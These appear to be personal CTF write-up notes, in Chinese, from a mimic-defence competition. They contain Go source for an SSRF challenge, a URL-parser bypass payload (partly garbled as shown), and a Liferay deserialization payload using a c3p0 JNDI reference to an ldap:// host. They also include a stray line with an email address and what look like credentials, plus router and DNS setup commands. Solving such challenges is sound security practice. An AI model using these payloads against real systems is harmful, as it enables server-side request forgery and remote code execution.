2020-06-23

拟态防御记录

web3

./sancheck.php

package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
	"net/url"
	"strings"
)

var (
	secret   = "xiaomo.wabzsy"
	banner   = "Golang HTTP Server (v2.3.3)"
	template = `<!DOCTYPE html>
<html>
	<head>
		<title>San Check</title>
	</head>
	<body>
		<form method="POST">
			<input type="text" name="url" />
			<input type="submit" value="淦!" />
		</form>
		<pre>
%s
		</pre>
	</body>
	<!-- ./sancheck.php -->
</html>`
)

func SanCheck(input string) error {
	u, err := url.Parse(input)

	if err != nil {
		return err
	}

	if u.Scheme != "http" {
		return fmt.Errorf("err: Invalid Scheme [%s]", u.Scheme)
	}

	if u.Opaque != "" {
		return fmt.Errorf("err: WHAT AER YOU DOING ?!!! (%s)", u.Opaque)
	}

	if u.Hostname() != "127.0.0.1" {
		return fmt.Errorf("err: Invalid Hostname [%s]", u.Hostname())
	}

	if u.Port() != "" && u.Port() != "80" {
		return fmt.Errorf("err: Invalid Port [%s]", u.Port())
	}

	if u.User == nil {
		return fmt.Errorf("err: Authorization Required")
	}

	if u.User.Username() != "root" {
		return fmt.Errorf("err: Invalid Username [%s]", u.User.Username())
	}

	if password, set := u.User.Password(); !set || password != "P@ssw0rd!" {
		return fmt.Errorf("err: Invalid Password [%s]", password)
	}

	if u.RequestURI() != "/flag.php" {
		return fmt.Errorf("err: Invalid RequestURI [%s]", u.RequestURI())
	}

	if u.Fragment != "" {
		return fmt.Errorf("err: Invalid Fragment [%s]", u.Fragment)
	}

	if !strings.Contains(u.String(), "'Pwned!'") {
		return fmt.Errorf("err: San Check failed")
	}

	return nil
}

func DefaultHandler(w http.ResponseWriter, req *http.Request) {

	input := req.PostFormValue("url")

	if input == "" {
		Response(w, template, "Where is the flag?")
		return
	}

	if err := SanCheck(input); err == nil {
		req, _ := http.NewRequest("GET", input, nil)
		req.Header.Add("Secret", secret)
		if resp, err := (&http.Client{}).Do(req); err == nil {
			if body, err := ioutil.ReadAll(resp.Body); err == nil {
				Response(w, template, string(body))
			}
			_ = resp.Body.Close()
		} else {
			Response(w, template, err.Error())
		}
	} else {
		Response(w, template, err.Error())
	}
}

func FlagHandler(w http.ResponseWriter, req *http.Request) {
	if strings.Join(req.Header["Secret"], "") != secret {
		Forbidden(w)
	} else if !strings.HasPrefix(req.RemoteAddr, "127.0.0.1") {
		Forbidden(w)
	} else {
		Response(w, "<h1>%s</h1>", readFlag())
	}
}

func readFlag() string {
	if bs, err := ioutil.ReadFile("./flag.txt"); err == nil {
		return string(bs)
	} else {
		return fmt.Sprintf("Unable to read flag.txt, please contact technical support.(%s)", err.Error())
	}
}

func CodeHandler(w http.ResponseWriter, _ *http.Request) {
	w.Header().Set("Content-Type", "text/plain; charset=utf-8")
	w.Header().Set("Server", banner)
	if bs, err := ioutil.ReadFile("main.go"); err == nil {
		_, _ = w.Write(bs)
	} else {
		_, _ = w.Write(
			[]byte(
				fmt.Sprintf("Unable to read main.go, please contact technical support.(%s)",
					err.Error(),
				),
			),
		)
	}
}

func Forbidden(w http.ResponseWriter) {
	w.WriteHeader(403)
	Response(w, "<h1>%s</h1>", "403 Forbidden")
}

func Response(w http.ResponseWriter, tpl string, response string) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	w.Header().Set("Server", banner)
	if _, err := fmt.Fprintf(w, tpl, response); err != nil {
		log.Println(err)
	}
}

func main() {
	http.HandleFunc("/", DefaultHandler)
	http.HandleFunc("/flag.php", FlagHandler)
	http.HandleFunc("/sancheck.php", CodeHandler)
	log.Fatal(http.ListenAndServe(":80", nil))
}

根据issuehttps://github.com/golang/go/issues/29098 绕过

http://root:P@[email protected]]'Pwned!']:80/flag.php#

web2

ccreater@163.com E6N0HT aa05940594

cmd={“/expandocolumn/add-column”:{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&+defaultData:com.mchange.v2.c3p0.JndiRefForwardingDataSource={“jndiName”:”ldap://127.0.0.1:1389/Object”,”loginTimeout”:0}

白盒拟态路由

1
2
3

vtysh
conf t
ip route 200.14.1.0/24 x.x.x.x

白盒拟态域名服务器

上传busybox 来使用nslookup等命令

cat /etc/name.conf
根据配置修改
sudo /usr/local/bind-9.11.19/bin/named/named
busybox nslookup www.test.com 172.29.126.2 看结果